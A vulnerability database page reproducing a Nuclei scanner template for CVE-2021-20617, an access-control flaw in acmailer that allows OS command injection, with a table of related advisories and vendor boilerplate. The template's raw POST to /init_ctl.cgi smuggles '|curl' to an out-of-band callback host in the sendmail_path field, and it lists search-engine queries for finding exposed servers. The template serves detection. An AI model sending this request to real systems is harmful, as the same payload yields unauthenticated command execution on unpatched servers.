| Reporter | Title | Published | Views | Family All 13 |
|---|---|---|---|---|
| CVE-2021-20617 | 14 Jan 202116:49 | ā | circl | |
| Seeds Acmailer Db and Seeds Acmailer Security Vulnerabilities | 14 Jan 202100:00 | ā | cnnvd | |
| CVE-2021-20617 | 14 Jan 202108:20 | ā | cve | |
| CVE-2021-20617 | 14 Jan 202108:20 | ā | cvelist | |
| EUVD-2021-8035 | 3 Oct 202520:07 | ā | euvd | |
| JVN#35906450: Multiple vulnerabilities in acmailer | 14 Jan 202100:00 | ā | jvn | |
| Multiple vulnerabilities in acmailer | 14 Jan 202107:22 | ā | jvn | |
| CVE-2021-20617 | 14 Jan 202109:15 | ā | nvd | |
| CVE-2021-20617 | 14 Jan 202109:15 | ā | osv | |
| Improper access control | 14 Jan 202109:15 | ā | prion |
id: CVE-2021-20617
info:
name: Acmailer - Improper Access Control to OS Command Injection
author: daffainfo
severity: critical
description: |
Improper access control vulnerability in acmailer ver. 4.0.1 and earlier, and acmailer DB ver. 1.1.3 and earlier allows remote attackers to execute an arbitrary OS command, or gain an administrative privilege which may result in obtaining the sensitive information on the server via unspecified vectors.
impact: |
Attackers can execute arbitrary OS commands or escalate privileges, potentially leading to full system compromise and sensitive data exposure.
remediation: |
Update to the latest version of acmailer and acmailer DB to address the issue.
reference:
- https://starlabs.sg/blog/2023/02-dissecting-the-vulnerabilities-a-comprehensive-teardown-of-acmailer/
- https://www.acmailer.jp/info/de.cgi?id=101
- https://jvn.jp/en/jp/JVN35906450/index.html
- https://nvd.nist.gov/vuln/detail/CVE-2021-20617
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-20617
epss-score: 0.07871
epss-percentile: 0.93991
cwe-id: NVD-CWE-Other
cpe: cpe:2.3:a:acmailer:acmailer:*:*:*:*:*:*:*:*,cpe:2.3:a:acmailer:acmailer_db:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: acmailer
product: acmailer,acmailer_db
shodan-query: title="ACMAILER4.0"
fofa-query: title="ACMAILER4.0"
tags: cve,cve2021,acmailer,rce,vkev,oast,oob
variables:
admin_name: "{{randbase(5)}}"
email: "{{randstr}}@{{rand_base(5)}}.com"
http:
- raw:
- |
POST /init_ctl.cgi HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
admin_name={{admin_name}}&admin_email={{email}}&login_id=loginid&login_pass=loginpw&sendmail_path=|curl http://{{interactsh-url}}&homeurl=http%3A%2F%2Fexample.com&mypath=env%2F
matchers:
- type: dsl
dsl:
- "contains(interactsh_request, 'User-Agent: curl')"
- "contains(interactsh_protocol, 'http')"
- contains(body, "<a href=\"index.cgi\">")
- 'status_code == 302'
condition: and
# digest: 490a0046304402202e966718ce1598e53f199e3d28d959abef73304de4443b30eebb1af4695db4c10220259eb08bb2c5c4aeea6d6d3024854219dbdc4072375419bbdbef2865f6faa1d4:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation withĀ Vulners data
WeĀ provide theĀ essential building blocks forĀ cybersecurity solutions withĀ comprehensive, structured, andĀ constantly updated vulnerability andĀ exploits data
Api
Power your application withĀ Vulners API
The Vulners REST API offers reliable, high-performance access toĀ vulnerabilityĀ intelligence, withĀ 99.9%Ā SLAĀ uptime andĀ CDN-backed data delivery forĀ seamlessĀ global access
App
Assess and manage vulnerabilities withĀ VulnersĀ tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation